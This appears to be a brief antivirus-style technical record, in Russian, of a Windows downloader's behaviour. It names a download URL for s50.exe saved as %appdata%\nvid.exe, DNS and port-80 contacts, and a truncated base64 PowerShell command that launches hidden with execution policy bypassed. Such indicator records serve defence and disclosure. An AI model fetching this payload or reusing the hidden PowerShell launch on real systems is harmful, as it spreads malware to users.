Техническая информация
- http://mwojciechowicz.nstrefa.pl/zdr/s50.exe как %appdata%\nvid.exe
- 'mw######howicz.nstrefa.pl':80
- http://mw######howicz.nstrefa.pl/zdr/s50.exe
- DNS ASK mw######howicz.nstrefa.pl
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAcgBvAGYAaQBsAGUAIAAtAHcAaQBuAGQAbwB3AHMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAAL...